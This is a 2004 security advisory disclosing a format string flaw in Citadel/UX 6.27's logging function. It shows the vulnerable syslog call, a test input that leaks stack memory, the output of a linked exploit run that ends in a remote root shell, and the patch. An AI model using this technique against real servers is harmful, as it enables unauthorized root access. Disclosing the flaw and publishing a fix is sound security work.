No System Group Advisory #09 - Citadel/UX versions 6.27 and below suffer from a format string vulnerability that allows for remote root exploitation.
4696971823e199337cff698d475784868739e6f9e92bff094b13b9b3806b7141
-------------------------------------------------
No System Group - Advisory #09 - 12/12/04
-------------------------------------------------
Program: Citadel/UX
Homepage: https://www.citadel.org
Operating System: Linux and Unix-Compatible
Vulnerable Versions: Citadel/UX v6.27 and prior
Risk: High
Impact: Remote Format String Vulnerability
-------------------------------------------------
- DESCRIPTION
-------------------------------------------------
Citadel/UX is an advanced client/server messaging and
collaboration system for BBS and groupware applications.
Users can connect to Citadel/UX using any telnet, WWW,
or client software. Among the features supported are
public and private message bases (rooms), electronic
mail, real-time chat, paging, etc. The server is
multithreaded and can easily support a large number of
concurrent users. In addition, SMTP, IMAP, and POP3
servers are built-in for easy connection to Internet
mail. Citadel/UX is both robust and mature, having been
developed over the course of the past thirteen years.
More informations at: https://www.citadel.org
- DETAILS
-------------------------------------------------
Exist a format string bug in the lprintf() function
of sysdep.c when parses erroneous arguments to the
syslog() function. This may to cause a denial of
service or give remote shell with privileges of
Citadel/UX.
---------- sysdep.c ----------
108: void lprintf(enum LogLevel loglevel, const char *format, ...) {
109: va_list arg_ptr;
110: char buf[SIZ];
111:
112: va_start(arg_ptr, format);
113: vsnprintf(buf, sizeof(buf), format, arg_ptr);
114: va_end(arg_ptr);
115:
116: if (syslog_facility >= 0) {
117: if (loglevel <= verbosity) {
118: /* Hackery -IO */
119: if (CC && CC->cs_pid) {
120: memmove(buf + 6, buf, sizeof(buf) - 6);
121: snprintf(buf, 6, "[%3d]", CC->cs_pid);
122: buf[5] = ' ';
123: }
124: syslog(loglevel, buf); // <-- the format bug
125: }
126: }
---------- sysdep.c ----------
Now we proceed to see what happens.
coki@nosystem:~/audit$ telnet localhost 504
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
200 nosystem Citadel server ready.
AAAA%x
530 Unrecognized or unsupported command.
quit
200 Goodbye.
Connection closed by foreign host.
coki@nosystem:~/audit$
We connect us to Citadel/UX server to 504 port and
send a test string.
coki@nosystem:~/audit$ tail -n 5 /var/log/messages
Dec 12 11:08:18 nosystem citadel[1305]: Database log file cull ended.
Dec 12 11:08:19 nosystem citadel[1303]: [ 1] Session started.
Dec 12 11:08:33 nosystem citadel[1303]: [ 1] Citadel: AAAA8090fe0
Dec 12 11:08:35 nosystem citadel[1303]: [ 1] Citadel: quit
Dec 12 11:08:35 nosystem citadel[1303]: [ 1] Session ended.
coki@nosystem:~/audit$
We can to see part of the stack sending a malicious format string.
- EXPLOIT
-------------------------------------------------
I have written a code exploit that use this format bug
for to obtain a remote shell in a target.
https://www.nosystem.com.ar/exploits/citadel_fsexp.c
coki@servidor:~$ make citadel_fsexp
coki@nosystem:~/audit$ ./citadel_fsexp -h localhost -t0
Citadel/UX v6.27 remote format string exploit
by CoKi <coki@nosystem.com.ar>
[*] host : localhost
[*] system : Slackware Linux 10.0
[*] syslog GOT address : 0x0809e9e8
[*] RET address : 0xbfffd5fa
[+] verifying host... OK
[+] conecting... OK
[+] building evil buffer... OK
[+] sending evil buffer... OK
[+] waiting for shell...
[+] connecting to shell... OK
[!] you have a shell :)
Linux nosystem 2.4.26 #29 Mon Jun 14 19:22:30 PDT 2004 i686 unknown unknown GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
- SOLUTIONS
-------------------------------------------------
The patch is included here:
--- sysdep.c 2004-11-03 17:19:00.000000000 -0300
+++ sysdep.c 2004-12-12 13:14:12.000000000 -0300
@@ -121,7 +121,7 @@
snprintf(buf, 6, "[%3d]", CC->cs_pid);
buf[5] = ' ';
}
- syslog(loglevel, buf);
+ syslog(loglevel, "%s", buf);
}
}
else if (loglevel <= verbosity) {
- REFERENCES
-------------------------------------------------
https://www.nosystem.com.ar/advisories/advisory-09.txt
- CREDITS
-------------------------------------------------
Discovered by CoKi <coki@nosystem.com.ar>
No System Group - https://www.nosystem.com.ar